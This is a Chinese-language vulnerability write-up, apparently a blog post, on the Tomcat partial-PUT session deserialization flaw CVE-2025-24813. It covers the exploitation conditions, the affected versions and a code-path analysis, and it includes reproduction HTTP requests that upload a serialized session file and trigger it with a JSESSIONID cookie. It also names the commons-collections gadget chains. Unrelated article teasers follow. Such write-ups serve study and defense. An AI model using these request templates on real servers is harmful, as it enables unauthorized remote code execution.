Tomcat Session 反序列化漏洞(CVE-2025-24813)
1.漏洞描述
Tomcat 是一个开源的、轻量级的 Web 应用服务器 和 Servlet 容器。它由 Apache 软件基金会下的 Jakarta 项目开发,是目前最流行的 Java Web 服务器之一。
该漏洞利用条件较为复杂,需同时满足以下四个条件:
应用程序启用了DefaultServlet写入功能,该功能默认关闭
应用支持了 partial PUT 请求,能够将恶意的序列化数据写入到会话文件中,该功能默认开启
应用使用了 Tomcat 的文件会话持久化并且使用了默认的会话存储位置,需要额外配置
应用中包含一个存在反序列化漏洞的库,比如存在于类路径下的 commons-collections,此条件取决于业务实现是否依赖存在反序列化利用链的库
2.影响版本
- 9.0.0.M1 <= tomcat <= 9.0.98
- 10.1.0-M1 <= tomcat <= 10.1.34
- 11.0.0-M1 <= tomcat <= 11.0.2
AI写代码3.漏洞复现
在conf/web.xml中,将DefaultServlet的readonly配置为false,启用写入功能
conf/context.xml
在conf/context.xml中,添加如下配置,开启File文件会话存储
- <Manager className="org.apache.catalina.session.PersistentManager">
-
- <Store className="org.apache.catalina.session.FileStore"/>
-
- </Manager>
AI写代码
将Commons Collections 3.2.1.jar放入lib文件夹
commons-collections:commons-collections:3.2.1 可以使用CommonsCollectionsK1 ,CommonsCollectionsK3 等链来打
- PUT /000/session HTTP/1.1
-
- Host: 192.168.100.1:8080
-
- Content-Length: 1000
-
- Content-Range: bytes 0-1000/1200
-
-
- {{反序列化文件内容)}}
AI写代码
该文件会在tomcat中\work\Catalina\localhost\ROOT目录生成
- GET / HTTP/1.1
-
- Host: 192.168.10.218:8080
-
- Cookie: JSESSIONID=.000
AI写代码
4.漏洞分析
自带的一个 Servelet 会处理一些默认类型的请求,如 PUT、POST、GET。
CVE-2017-12615、CVE-2024-50379均涉及该方法,也就是 doPUT,其实逻辑很简单,如以下代码。
WebResource oldResource = this.resources.getResource(path)AI写代码这里直接获取 Web 根目录了,然后将文件上传,这也是最开始的 PUT 文件上传漏洞点。而今天的漏洞点出自上述的 else 分支。
executePartialPutAI写代码Tomcat 在处理不完整的 PUT 请求有单独的逻辑。这个和请求头 Content-Range 有关
其实你可以理解为和分块差不多一个意思。
- PUT /CVE_2025_24813_war_exploded/a/session HTTP/1.1
- Host: 192.168.10.218:8080
- Content-Length: 1000
- Content-Range: bytes 0-1000/1200
-
- testtesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttest
AI写代码利用该方法上传一个session 文件,看看过程
start、end、length和请求头对应,随后会进入 executePartialPut 内。
在这里会将斜杠替换为.,因此我们可以上传一个 xxx.session 文件。具体处理逻辑在底部
核心逻辑在这里,以 range.length作为文件的长度,range.start作为起始点开始处理流,这也是为什么 length 必须要大于 body 的总长度,不然无法将内容完全上传。
状态码409 错误,实际上已经上传了
FileStore#load
这部分是反序列化触发点,CVE-2020-9484出自这里,所以不难看出这其实是一个组合漏洞,当时CVE-2020-9484是因为存在目录穿越问题所以可以穿越加载一个自定义的序列化文件。
this.file(id); 内容如下
修复方式就是getCanonicalFile处理穿越问题。因此无法目录穿越了,只能加载缓存目录下的.session后缀文件并且将其反序列化。反序列化的触发点是没删除的。
相关文章:
)
Tomcat Session 反序列化漏洞(CVE-2025-24813)
1.漏洞描述 Tomcat 是一个开源的、轻量级的 Web 应用服务器 和 Servlet 容器。它由 Apache 软件基金会下的 Jakarta 项目开发,是目前最流行的 Java Web 服务器之一。 该漏洞利用条件较为复杂,需同时满足以下四个条件: 应用程序启用了DefaultS…...
maven导入本地jar示例
1、${project.basedir} 是固定写法 <dependency><groupId>alipay-sdk</groupId><artifactId>alipay-sdk</artifactId><version>1.0</version><scope>system</scope><systemPath>${project.basedir}/src/main/lib…...
哨兵模式下,Redis主从同步原理,新增的Redis从节点如何同步
在Redis哨兵模式下,新增从节点的同步过程遵循全量同步和增量同步相结合的机制,具体原理如下: 一、新增从节点的同步流程 1. 建立连接与初始化请求 新增从节点首次启动时,通过replicaof <master-ip> <master-port>命…...
SpringBoot系列之集成Redisson实现布隆过滤器
基于Spring Boot集成Redisson实现布隆过滤器 在高并发和大数据量的场景下,布隆过滤器是一种非常高效的存储结构,可以用于快速判断一个元素是否存在于集合中。本文将介绍如何在Spring Boot中集成Redisson来实现布隆过滤器,并通过一个订单查询…...
Matlab 非线性阻尼四分之一车体被动和模糊pid控制悬架对比
1、内容简介 Matlab 192-非线性阻尼四分之一车体被动和模糊pid控制悬架对比 可以交流、咨询、答疑 2、内容说明 略 汽车车辆悬架系统的核心元件主要有控制器、导向机构、弹性元件以及减 震器等,该系统是汽车最重要的结构系统之一,主流车辆悬架大致有被…...
JavaWeb 课堂笔记 —— 07 Web 入门、HTTP 协议和Tomcat
本系列为笔者学习JavaWeb的课堂笔记,视频资源为B站黑马程序员出品的《黑马程序员JavaWeb开发教程,实现javaweb企业开发全流程(涵盖SpringMyBatisSpringMVCSpringBoot等)》,章节分布参考视频教程,为同样学习…...
Android学习总结之OKHttp拦截器和缓存
深入理解 OkHttp 拦截器 1. 拦截器接口详解 Interceptor 接口是自定义拦截器的基础,它仅包含一个抽象方法 intercept。以下是对该方法参数和返回值的详细解释: import okhttp3.Interceptor; import okhttp3.Request; import okhttp3.Response; import…...
- 工作流引擎中流程定义删除机制)
Activiti(五)- 工作流引擎中流程定义删除机制
1、引言 Activiti作为一款轻量级、开源的工作流和业务流程管理(BPM)平台,在实际运维过程中,随着业务发展会产生大量需要清理的流程定义,不规范的删除操作可能导致数据不一致或系统异常等问题。本文将介绍Activiti中删除流程定义的相关方式及…...
C#里使用MaterialDesign来构造自定义窗口
本例子主要就是创建一个上面的界面, 它是一个采用MaterialDesign开源库来创建的WPF程序。 先要编辑App.xaml文件: <Application x:Class="MDIXWindow.App"xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"xmlns:x="http:/…...
PyTorch 模型转换为 TensorRT 引擎的通用方法
PyTorch 模型转换为 TensorRT 引擎的通用方法 在深度学习模型的部署过程中,提升推理性能是一个重要的目标。将 PyTorch 模型(.pt 文件)转换为 TensorRT 引擎(.engine 文件)是一种常用的优化手段。本文将介绍几种通用的…...
利用Ruby的Typhoeus编写爬虫程序
Typhoeus是一个基于libcurl的HTTP客户端,支持并行请求,适合高效爬取数据。用户可能想要一个简单的例子,或者需要处理更复杂的情况,比如分页、并发请求或者数据解析。 首先,我应该检查用户是否已经安装了Typhoeus。通常…...
Fabric8 Kubernetes使用介绍
Fabric8 Kubernetes Client 是一个强大的 Java 客户端库,用于与 Kubernetes 集群交互。以下是快速上手指南: 1. 添加依赖 Maven 依赖: <dependency><groupId>io.fabric8</groupId><artifactId>kubernetes-client&…...
种田游戏的综合尝试
游戏角色 详细教程 一、准备工作 1、场景重命名为Farm 2、导入资源 (1) 新建文件夹。Import Asset (2) 导入:人物、走、跑、休息 3、设置摄像机 二、制作角色预制体 1、增加角色,命名为Player,设置材质、人类角色 2、设置角色的空闲…...
uniapp解决上架华为应用市场审核要求-监听权限的申请
支持android平台全局监听权限的申请。当申请权限时,会在页面顶部显示申请权限的目的。主要解决上架华为应用市场审核要求:APP在调用终端权限时,应同步告知用户申请该权限的目的。 因为如果不提示,你上架应用市场会被打打回来 Tip…...
【结肠息肉AI论文集】ASPS: Augmented Segment Anything Model for Polyp Segmentation
摘要 息肉分割在结直肠癌诊断中起着关键作用。最近,Segment Anything Model(SAM)的出现为息肉分割带来了前所未有的潜力,其在大规模数据集上的强大预训练能力使其备受关注。然而,由于自然图像和内窥镜图像之间存在领域…...
MHA详解
MHA(Master High Availability)是一个用于 MySQL 数据库的高可用性解决方案。它基于 MySQL 主从复制机制实现,通过自动化的方式进行故障检测和自动故障转移操作,确保在 MySQL 主节点(Master)发生故障时&…...
蓝桥杯单片机刷题——通过按键触发串口传输电压值
设计要求 通过内部ADC完成电位器RB2的输出电压检测,并显示在数码管上; 通过串口向PC端返回当前检测的电压值。 按键“S4”定义为发送按键,按下按键S4,串口向PC端发送当前检测的电压值。 串口发送格式: U:1.25V\r\…...
github fatal Authentication failed for解决
常用的生成令牌方式不多介绍,参考1 得到令牌后替换url 格式为 https://你的令牌github.com/<USERNAME>/<REPO>.git查看仓库url git remote -v假如为 https://github.com/jiang/megatron.git 令牌为CCCC 则将“令牌”插入github之前 使用 git remote …...
计算机网络基础知识
🧑 博主简介:CSDN博客专家,历代文学网(PC端可以访问:https://literature.sinhy.com/#/literature?__c1000,移动端可微信小程序搜索“历代文学”)总架构师,15年工作经验,…...
Debian/Ubuntu Server高效禁用海外IP访问的一种方法
面对越来越多的海外IP扫描、攻击,让服务器损失大量的性能,影响服务器提供正常的对外服务,同时给自己的服务器处理风险之中,本文讲述了一种使用ufw防火墙的方式高效阻止海外IP的一种方法。 阻止IP访问的方法有很多种,这…...
2025年4月第2周 github的AI科技工具汇总
以下是2025年4月第2周GitHub上值得关注的AI科技工具与生态动态汇总,结合官方发布及开发者社区热点整理: AI编程工具升级 GitHub Copilot Agent Mode 全量发布 核心功能:在VS Code中启用后,可自主完成多文件代码重构、测试驱动开发…...
RIP V2路由协议配置实验CISCO
1.RIP V2简介: RIP V2(Routing Information Protocol Version 2)是 RIP 路由协议的第二版,属于距离矢量路由协议,主要用于中小型网络环境。相较于 RIP V1,RIP V2 在功能和性能上进行了多项改进,…...
Python-Django+vue二手电子设备交易平台功能说明
❥(^_-) 上千个精美定制模板,各类成品Java、Python、PHP、Android毕设项目,欢迎咨询。 ❥(^_-) 程序开发、技术解答、代码讲解、文档,💖文末获取源码+数据库+文档💖 💖软件下载 | 实战案例 💖文章底部二维码,可以联系获取软件下载链接,及项目演示视频。 本项目…...
 : MCTargetDesc 核心模块有哪些?)
DeepSeek 教我LLVM(2) : MCTargetDesc 核心模块有哪些?
在 LLVM 中,MCTargetDesc(Machine Code Target Description)是描述目标架构机器代码生成的核心模块,其核心组件可分为以下几类: 一、目标架构元数据 MCInstrInfo 功能:定义指令的元数据(操作数、…...
Linux:shell运行原理+权限
1.shell的运行原理 如果我们打开了命令终端或者是xshell进行远程登录服务器,就会看到命令行,如下图所示: 这个命令行本身也是系统中一个运行起来的程序,它用来接收用户的输入,帮用户来执行指令,将运行结果展…...
英伟达Llama-3.1-Nemotron-Ultra-253B-v1语言模型论文快读:FFN Fusion
FFN Fusion: Rethinking Sequential Computation in Large Language Models 代表模型:Llama-3.1-Nemotron-Ultra-253B-v1 1. 摘要 本文介绍了一种名为 FFN Fusion 的架构优化技术,旨在通过识别和利用自然并行化机会来减少大型语言模型(LLM…...
什么是A2A协议?什么是MCP协议?A2A和MCP协议哪个更好?
什么是A2A协议?什么是MCP协议?A2A和MCP协议哪个更好? 摘要 在人工智能领域,A2A协议(Agent-to-Agent协议)和MCP协议(Model Context Protocol)是两个重要的标准,它们分别…...
C++版——day12)
剑指Offer(数据结构与算法面试题精讲)C++版——day12
剑指Offer(数据结构与算法面试题精讲)C版——day12 题目一:小行星碰撞题目二:每日温度题目三:直方图最大矩形面积附录:源码gitee仓库 题目一:小行星碰撞 由题意可知,这里我们可使用栈…...
Leetcode131:分割回文串——回溯算法
Leetcode131:分割回文串——回溯算法 给一个字符串aab, 如何分割,使得子串 都是回文串,返回所有的分割方案。 答:1、aa,b。 2、a,a, b. 重点,想想树怎么画的。 发现:所有…...
Nginx常用工具
Nginx常用工具 Nginx常用工具vscode配置Nginx插件在线生成Nginx配置文件Nginx可视化配置工具 Nginx常用工具 编写Nginx配置时,使用VSCodeNginx插件,能实现自动补全格式化配置. vscode配置Nginx插件 Nginx代码高亮插件: nginx-formatter Nginx代码格式化插件&#…...
算法——回溯
学习目标: 掌握算法入门知识 学习内容: 回溯的定义例题详细步骤讲解(求子集、求全排列) 1. 回溯的定义 回溯法是一种通过 试探性搜索 来求解问题的算法思想。一个复杂问题的解决方案是由若干个小的决策步骤组成的决策序列&…...
【图片识别改名工具】如何识别图片中文字内容,并根据文字对图片批量重命名批量改名,基于WPF和腾讯OCR的完整实现
办公场景 批量处理图片文件:用户有一批图片文件,图片中包含文字信息(如编号、日期、名称等),需要根据图片中的文字内容对图片进行重命名。自动化办公:在办公场景中,用户需要将图片文件按内容分类或归档,手动重命名效率低下,自动化工具可以大幅…...
)
C语言超详细指针知识(一)
通过前面一段学习C语言的学习,我们了解了数组,函数,操作符等相关知识,今天我们将要进行指针学习,这是C语言中较难的一个部分,我将带你由浅入深慢慢学习。 1.内存与地址 在正式学习指针前,我们首…...
【实战手册】8000w数据迁移实践:MySQL到MongoDB的完整解决方案
🔥 本文将带你深入解析大规模数据迁移的实践方案,从架构设计到代码实现,手把手教你解决数据迁移过程中的各种挑战。 📚博主其他匠心之作,强推专栏: 小游戏开发【博主强推 匠心之作 拿来即用无门槛】文章目录 一、场景引入1. 问题背景2. 场景分析为什么需要消息队列?为…...
本地部署DeepSeek-R1,搭建本地知识库
本地部署DeepSeek-R1,搭建本地知识库 本章节内容是参照哔哩哔哩上的【一拳S7】作者分享的视频教程(【喂饭教程】20分钟教会你本地部署DeepSeek-R1,并搭建自己的知识库!小白也能轻松上手!!)搭建的。 概述:本…...
多链协议和跨链桥
文章目录 多链协议和跨链桥一、核心功能与分类二、主流协议技术对比三、关键技术机制四、典型应用场景五、核心风险与挑战 多链协议和跨链桥 一、核心功能与分类 多链协议与跨链桥旨在解决区块链生态的孤岛效应,实现资产与数据的跨链互通。 主要分为两类…...
2025.4.9 华为机考 第1题-补丁版本升级
目录 题目内容样例1样例2思考思路算法思路实现代码(封装Class中) 题目内容 样例1 样例2 思考思路 题目让我们找出所有迭代次数最多的补丁版本,并且按字典序排列输出。迭代次数指的是从该版本到根节点的路径长度,而根节点的迭代次…...
Qt平台+三维建模+动画演示+工业风展示
三维建模不止于形,界面定制不止于皮,实时交互不止于快。 我们专注程序界面定制,尤其擅长: 🔧 Qt平台 精准开发 🧊 三维建模 动画演示 工业风展示 ⚡ 实时交互系统 支持多线程响应、动态数据绑定 …...
: 神烦狗(DOGE))
通付盾风控智能体(RiskAgent): 神烦狗(DOGE)
在数字化业务高速发展的今天,风控系统已成为企业抵御黑产、欺诈、保障交易安全的核心防线。然而传统风控面临人力依赖高与策略滞后性等挑战,数据分析师需每日从海量数据中手动提炼风险特征、设计防护规则,耗时费力;新策略从发现到…...
Anaconda环境管理及 pycharm、jupyter notebook 的配置
为什么要Anaconda环境管理,因为不同的项目可能使用的环境是不一样的,比如说有一个项目要用到pytorch0.4,另一个要用到pytorch1.0,我们不可能在一个环境中既装pytorch0.4,又装pytorch1.0,因此我们在用pytorc…...
DevOps与功能安全:Perforce ALM通过ISO 26262合规认证,简化安全关键系统开发流程
本文来源perforce.com,由Perforce中国授权合作伙伴、DevSecOps解决方案提供商-龙智翻译整理。 近日,Perforce ALM(原Helix ALM)通过了国际权威认证机构 TV SD的ISO 26262功能安全流程认证!该认证涵盖Perforce ALM解决方…...
OpenCV 伪彩色处理
伪彩色处理是将灰度图像通过颜色映射转换为彩色图像的技术,常用于增强可视化效果或突出显示特定灰度范围。OpenCV 提供了多种方法实现伪彩色处理。 1. 使用 applyColorMap 函数 OpenCV 提供了 cv::applyColorMap() 函数,支持多种预定义的色彩映射&…...
【物联网】PWM控制蜂鸣器
文章目录 一、PWM介绍1.PWM的频率2.PWM的周期 二、PWM工作原理分析三、I.MX6ull PWM介绍1.时钟信号2.工作原理3.FIFO 四、PWM重点寄存器介绍1.PWM Control Register (PWMx_PWMCR)2.PWM Counter Register (PWMx_PWMCNR)3.PWM Period Register (PWMx_PWMPR)4.PWM Sample Register…...
centos-stream-9上安装nvidia驱动和cuda-toolkit
这里写目录标题 驱动安装1. 更新系统2. NVIDIA GPU安装检查系统是否安装了 NVIDIA GPU2.1 首先,使用以下命令更新 DNF 软件包存储库缓存:2.2 安装编译 NVIDIA 内核模块所需的依赖项和构建工具2.3 在 CentOS Stream 9 上添加官方 NVIDIA CUDA 软件包存储库…...
嵌入式---烧录器
一、核心定义与本质功能 烧录器(Programmer)是一种将用户编写的程序代码(如.hex/.bin文件)写入单片机内部存储器(Flash/EEPROM/ROM)的专用工具,核心功能包括: 程序烧写:…...
centos-LLM-生物信息-BioGPT-使用1
参考: GitHub - microsoft/BioGPT https://github.com/microsoft/BioGPT BioGPT:用于生物医学文本生成和挖掘的生成式预训练转换器 |生物信息学简报 |牛津学术 — BioGPT: generative pre-trained transformer for biomedical text generation and mini…...
Golang|协程
文章目录 go func 和 WaitGroup协程 v.s. 线程GMP 并发模型 go func 和 WaitGroup 在 Go 语言中,协程(goroutine)之间并没有严格的父子关系。一个协程中可以启动其他协程,即使启动它的协程已经结束,所启动的新协程仍会…...
免费下载地图切片数据以及通过CesiumEarth在Windows和安卓本地浏览
免费下载地图切片数据 本文概述 互联网存在许多免费的地图资源,但是这些资源都需要在互联网环境下使用,如果使用场景是在离线或本地设备上,没有在线调用地图的途径,这时如果没有自己制作地图的能力,只能提前下载地…...
Enovia许可使用限制
在数字化时代,企业的研发与创新活动越来越依赖于先进的软件工具。Enovia,作为一款功能强大的产品生命周期管理(PLM)解决方案,为众多行业的企业提供了从概念到生产的全方位支持。然而,为了确保软件的合规性与…...
“米其林.网址”中文域名仲裁案:知名企业如何保护网络知产权益?
中文域名与商标协同保护经典案例解析 近期,国际知名的轮胎制造商米其林公司(Compagnie Gnrale des tablissements Michelin)通过仲裁程序成功夺回了被抢注的中文域名<米其林.网址>。这一案件再次引发了公众对企业网络知识产权保护和域名…...